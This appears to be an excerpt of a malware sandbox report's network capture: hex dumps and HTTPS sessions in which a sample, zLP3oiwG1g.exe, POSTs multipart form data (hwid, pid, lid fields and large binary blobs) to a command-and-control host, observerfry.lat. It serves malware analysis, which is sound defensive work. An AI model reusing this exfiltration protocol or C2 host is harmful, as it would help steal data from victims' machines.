                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 72 6b 4a 38 31 53 77 6f 56 52 4f 4f 46 4d 71 70 71 61 68 54 2b 6a 61 73 64 79 35 42 6e 50 46 71 74 6d 4a 6d 31 63 6b 47 57 4c 61 65 63 6a 44 56 52 57 53 74 4b 34 61 6b 36 75 7a 78 32 4a 4c 50 63 72 55 75 41 78 52 35 72 57 71 32 4d 6d 62 56 79 65 35 59 37 6f 36 6d 5a 49 31 51 49 62 67 66 71 6e 58 58 6b 61 6b 74 72 6f 73 36 30 42 49 54 5a 59 47 56 43 73 36 71 5a 35 69 52 54 67 53 36 32 6a 5a 63 2b 54 48 5a 67 48 37 6e 5a 5a 2b 35 34 4a 7a 54 77 30 70 74 4a 79 38 6b 65 66 53 4f 7a 31 4d 2b 74 61 67 62 66 62 62 4c 47 77 6e 49 61 53 7a 4a 56 36 34 67 6a 76 32 31 4c 46 5a 66 62 72 67 43 62 7a 30 6b 71 57 75 54 55 31 71 31 71 62 64 45 6b 70 35 32 4c 4a 46 42 59 4a 77 66 53 78 58 57 6b 61 69 31 72 68 63 36 71 43 59 7a 65 54 32 67 39 76 4a 37 65 2f 54 56 44 6e 6d
                                                                                                                                                                              Data Ascii: rkJ81SwoVROOFMqpqahT+jasdy5BnPFqtmJm1ckGWLaecjDVRWStK4ak6uzx2JLPcrUuAxR5rWq2MmbVye5Y7o6mZI1QIbgfqnXXkaktros60BITZYGVCs6qZ5iRTgS62jZc+THZgH7nZZ+54JzTw0ptJy8kefSOz1M+tagbfbbLGwnIaSzJV64gjv21LFZfbrgCbz0kqWuTU1q1qbdEkp52LJFBYJwfSxXWkai1rhc6qCYzeT2g9vJ7e/TVDnm
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 4f 56 31 50 4d 46 48 32 78 7a 32 2f 4d 47 38 56 6a 75 61 6f 41 59 7a 53 57 53 4d 38 69 74 53 58 72 54 30 55 79 52 54 67 7a 74 6f 4e 45 77 67 34 42 37 58 4c 41 4c 38 6b 65 79 79 6d 33 4f 6b 76 71 50 4a 6b 5a 7a 61 74 67 5a 76 5a 4e 55 53 41 4a 71 32 4b 32 6e 77 64 54 6d 41 66 76 63 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54 61 61 68 30 50 49 31 58 2f 6a 54 61 71 4b 54 49 56 6a 75 71 71 41 49 72 65 54 6a 49 56 6c 4b 72 4d 37 6a 78 61 6c 6a 75 78 78 74 52 79 55 67 68 34 66 71 33 44 64 59 4e 6b 4e 54 50 77 6c 65 51 79 69 4d 5a 51 49 67 79 37 32 66 37 6a 4e 56 57 48 50 62 65 4a 32 6e 77 64 54 6d 41 66 76 38 56 31 75 44 73 31 63 2b 43 66 2f 31 4c 59 6e 77 35 33 42 65 53 4e 6d 66 74 79 44 4d 4e 6a 34 4a 54
                                                                                                                                                                              Data Ascii: OV1PMFH2xz2/MG8VjuaoAYzSWSM8itSXrT0UyRTgztoNEwg4B7XLAL8keyym3OkvqPJkZzatgZvZNUSAJq2K2nwdTmAfvcV1uDs1c+Cf/1LYnw53BeSNmftyDMNj4JTaah0PI1X/jTaqKTIVjuqqAIreTjIVlKrM7jxaljuxxtRyUgh4fq3DdYNkNTPwleQyiMZQIgy72f7jNVWHPbeJ2nwdTmAfv8V1uDs1c+Cf/1LYnw53BeSNmftyDMNj4JT
                                                                                                                                                                              2024-12-23 07:08:39 UTC1369INData Raw: 7a 5a 45 72 63 56 31 73 47 6f 74 61 37 48 48 74 41 71 45 7a 78 49 69 41 4b 33 55 6c 36 30 38 46 4d 6c 74 6f 59 79 4b 50 31 4a 50 62 45 48 6a 68 58 57 6a 5a 47 78 72 70 6f 33 38 56 4d 57 49 54 47 56 43 36 74 50 61 2f 79 42 53 6b 6a 75 6a 77 61 51 4d 63 46 6f 6e 56 2b 37 4a 42 4c 45 75 59 7a 36 7a 33 61 4d 35 74 65 56 4d 49 67 71 70 31 75 6a 37 4d 56 53 66 4b 75 44 49 32 69 6f 64 45 47 42 71 2f 34 77 6c 76 32 6f 37 61 37 79 4e 2f 45 65 47 32 6c 6b 31 47 65 61 54 77 2b 70 79 53 39 38 30 34 4a 44 61 61 67 34 47 59 46 57 74 30 33 58 37 4a 48 67 71 73 38 4f 6e 46 5a 6e 4f 58 54 4d 5a 37 61 72 6e 77 43 42 54 67 53 37 69 74 35 63 32 53 31 30 6a 56 2b 71 31 43 35 45 34 63 6a 75 7a 6a 34 67 41 68 73 52 67 47 79 32 37 6b 38 6d 76 46 46 65 48 4c 75 44 49 32 69 6f 64
                                                                                                                                                                              Data Ascii: zZErcV1sGota7HHtAqEzxIiAK3Ul608FMltoYyKP1JPbEHjhXWjZGxrpo38VMWITGVC6tPa/yBSkjujwaQMcFonV+7JBLEuYz6z3aM5teVMIgqp1uj7MVSfKuDI2iodEGBq/4wlv2o7a7yN/EeG2lk1GeaTw+pyS9804JDaag4GYFWt03X7JHgqs8OnFZnOXTMZ7arnwCBTgS7it5c2S10jV+q1C5E4cjuzj4gAhsRgGy27k8mvFFeHLuDI2iod


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              2192.168.2.1049725104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:41 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=7KS519323WMYJSP
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 12835
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:41 UTC12835OUTData Raw: 2d 2d 37 4b 53 35 31 39 33 32 33 57 4d 59 4a 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 4b 53 35 31 39 33 32 33 57 4d 59 4a 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4b 53 35 31 39 33 32 33 57 4d 59 4a 53 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                              Data Ascii: --7KS519323WMYJSPContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--7KS519323WMYJSPContent-Disposition: form-data; name="pid"2--7KS519323WMYJSPContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                              2024-12-23 07:08:42 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:42 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=el7rfvb0rnghv1m4om37k2a8n6; expires=Fri, 18 Apr 2025 00:55:20 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDbRlHM27k3Tserk3vAqrf4oFRjkoIbW37hNBKBGmWSIEJgVLzTr1yadRNJYTVGdTfgwm099JbWdMqqDCW09QRsaCxIoUaJO5j7WppdXYPhuZEQvWsNapHFDBD5%2B%2FbbsMxA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f668597a84f17a9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1690&rtt_var=642&sent=10&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13771&delivery_rate=1694718&cwnd=238&unsent_bytes=0&cid=705f1fdd930686ff&ts=1086&x=0"
                                                                                                                                                                              2024-12-23 07:08:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:08:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              3192.168.2.1049731104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:44 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=F9JM2P9ZQQ
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 15032
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:44 UTC15032OUTData Raw: 2d 2d 46 39 4a 4d 32 50 39 5a 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 46 39 4a 4d 32 50 39 5a 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 39 4a 4d 32 50 39 5a 51 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 46 39 4a 4d 32 50 39 5a 51 51 0d 0a 43 6f
                                                                                                                                                                              Data Ascii: --F9JM2P9ZQQContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--F9JM2P9ZQQContent-Disposition: form-data; name="pid"2--F9JM2P9ZQQContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--F9JM2P9ZQQCo
                                                                                                                                                                              2024-12-23 07:08:44 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:44 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=crtv6ic1l087lih297eeeelk65; expires=Fri, 18 Apr 2025 00:55:23 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CYz3%2F8IvdcIUjmEpEhaNDb1mlZMHGcZSuIbWT7KhzvfjliZ%2FG9A0DLMdvB9bmt2QNCsUgKOyZAYrs6NWKsd%2Fla5cf1UJhtIfVp%2FoyapRxLsloxvy327Ih0YObYbT72FhPQA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685a89f7a42be-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1731&min_rtt=1721&rtt_var=667&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15963&delivery_rate=1615938&cwnd=213&unsent_bytes=0&cid=1a8727e2f75b585f&ts=914&x=0"
                                                                                                                                                                              2024-12-23 07:08:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:08:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              4192.168.2.1049737104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:46 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=W15LETL8XXHB
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 20406
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:46 UTC15331OUTData Raw: 2d 2d 57 31 35 4c 45 54 4c 38 58 58 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 57 31 35 4c 45 54 4c 38 58 58 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 57 31 35 4c 45 54 4c 38 58 58 48 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 31 35 4c 45 54 4c 38
                                                                                                                                                                              Data Ascii: --W15LETL8XXHBContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--W15LETL8XXHBContent-Disposition: form-data; name="pid"3--W15LETL8XXHBContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--W15LETL8
                                                                                                                                                                              2024-12-23 07:08:46 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                              Data Ascii: lpQ0/74G6(~`~O
                                                                                                                                                                              2024-12-23 07:08:47 UTC1135INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:47 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=tpbk2hqp4h8enhk373qcnvrprd; expires=Fri, 18 Apr 2025 00:55:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flaPlgMzyKTtHuTwsk3H4%2BnSu%2BKqhL%2BTvD54c%2FQjPyRHVcTvz88j17idftlUby%2BOhjn%2Fl6W8d83rcppobuxfEfB9JHRF5QrMwbi5whC2x%2B8Rz4YLNJH6SNR9Aw2x8mYzZRw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685b72eacc45e-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1622&rtt_var=625&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21361&delivery_rate=1728833&cwnd=243&unsent_bytes=0&cid=12f90d277d35049c&ts=983&x=0"
                                                                                                                                                                              2024-12-23 07:08:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:08:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              5192.168.2.1049743104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:49 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=DDMTGP5F02YW
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 1227
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:49 UTC1227OUTData Raw: 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 44 44 4d 54 47 50 35 46 30 32 59 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 44 44 4d 54 47 50 35 46
                                                                                                                                                                              Data Ascii: --DDMTGP5F02YWContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--DDMTGP5F02YWContent-Disposition: form-data; name="pid"1--DDMTGP5F02YWContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--DDMTGP5F
                                                                                                                                                                              2024-12-23 07:08:49 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Mon, 23 Dec 2024 07:08:49 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=fmsf31nhpmlfd15fsjhigh628h; expires=Fri, 18 Apr 2025 00:55:28 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0LhV2YbA9vdsPkn%2Fo3NuZGxXtMSJI2CNnggcgLPavHPGXlq2FQD0hTxx3lKyZrwegJVmeRf8QtKPtQg2hDIUfz1Oh2kDdjLf5sl2HMsmScODQICb7gHoPfzH%2BefnWcV9dq8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8f6685c7790f80df-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1664&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2137&delivery_rate=1659090&cwnd=215&unsent_bytes=0&cid=e8991a28fb07a78d&ts=785&x=0"
                                                                                                                                                                              2024-12-23 07:08:49 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                              2024-12-23 07:08:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              6192.168.2.1049751104.21.36.2014437300C:\Users\user\Desktop\zLP3oiwG1g.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-23 07:08:51 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: multipart/form-data; boundary=15G7M9X12XX
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 552953
                                                                                                                                                                              Host: observerfry.lat
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 36 34 37 44 42 42 45 39 43 32 44 38 36 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 35 47 37 4d 39 58 31 32 58 58
                                                                                                                                                                              Data Ascii: --15G7M9X12XXContent-Disposition: form-data; name="hwid"658647DBBE9C2D86AC8923850305D13E--15G7M9X12XXContent-Disposition: form-data; name="pid"1--15G7M9X12XXContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--15G7M9X12XX
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 90 05 f3 4f 49 0a 1f e0 9d b0 46 82 49 bf 0b 16 f2 63 f5 5f aa 4d 1c db 56 6d 4a e5 06 23 c7 3a cd 40 76 1c 99 07 af d9 a6 a4 2e 65 3a 2a 6f e3 a7 73 87 95 e8 0c fb 74 df ce 7e 74 b3 95 3d 30 d7 de 57 ab d8 3c 65 49 be 71 4e 9b b0 4e 8a c5 1f 6d 18 b7 4d 76 36 ef 0d 35 4c c1 46 05 5a 69 08 bd ac 93 f3 ff 2d 7a fb 46 6a 9a 58 10 45 e6 d2 88 fb d6 b3 7d b8 9c 7c e5 3d 90 ac 0e 46 1a be e6 a8 53 e0 de 00 68 ed 60 90 3b 5c ea 06 ad 47 04 b4 be 70 00 a4 a1 60 6f 2c 23 6d 80 5a 81 87 55 31 6c be d3 b0 ca dc dd b9 ee 6f 8b 1f 16 8e ce 81 91 68 a5 6a 71 6b 78 ae fb 83 47 5b d5 c7 7e dd 4f 2b df 0c 20 da ac cc 5d 7e 6d 4c 80 3e 44 1b c2 b1 cf 12 c0 e0 90 62 5d 0a aa 61 b6 38 b6 cb 63 a8 84 94 dc 53 5b d1 6c 35 00 96 9f bb f2 5d 29 f3 73 b6 78 62 5d fc 5a f1 ca 75
                                                                                                                                                                              Data Ascii: OIFIc_MVmJ#:@v.e:*ost~t=0W<eIqNNmMv65LFZi-zFjXE}|=FSh`;\Gp`o,#mZU1lohjqkxG[~O+ ]~mL>Db]a8cS[l5])sxb]Zu
                                                                                                                                                                              2024-12-23 07:08:51 UTC15331OUTData Raw: 3d fd 70 fc 0b 99 6e 84 6e a2 6e 44 eb ba 74 7e 3a 18 cb 7d 74 cb c1 dd 78 84 cb 09 95 2a 17 d7 e5 a0 1b ae e5 76 b1 54 d6 7f b5 8e da 60 b5 b4 e2 e1 51 67 2b ed 1e 9f 4f 04 8f 72 69 08 e2 16 c1 94 66 6a 27 10 e3 e3 c8 a7 7d af ed 7b c9 57 9b ac e4 94 12 56 f6 32 21 b4 2c b8 5b d4 c9 91 23 2f cb 7b fb 14 35 0a 53 2f 9a ed 81 ed e8 0b 46 62 ce 60 e2 de 3a cc 03 3f 01 67 1f 9c a0 7d ac b8 59 80 ed b9 d3 04 3e 08 f7 38 ec a0 23 5f 25 c6 2d 6a 06 f5 c6 5d 56 2e 8f 6b ae b4 d1 0b a5 c9 33 5d 9a c8 10 d9 5a d1 d4 9d 92 fd 23 44 7e 38 4c 4d ba 20 ce 49 59 9e 94 12 1e 80 cf db b6 ad 23 97 33 8b 76 13 7b 92 7f 66 c5 e9 4b cf cc f3 1c af a9 67 a5 6d 60 38 55 32 1a 6a d9 4b f4 99 51 c9 3a 5f 8e 3c bb 6d a6 fd 9a 41 79 1e 23 fd f6 a8 6c 6a 9e ac f2 fe 81 78 8f c1 b0
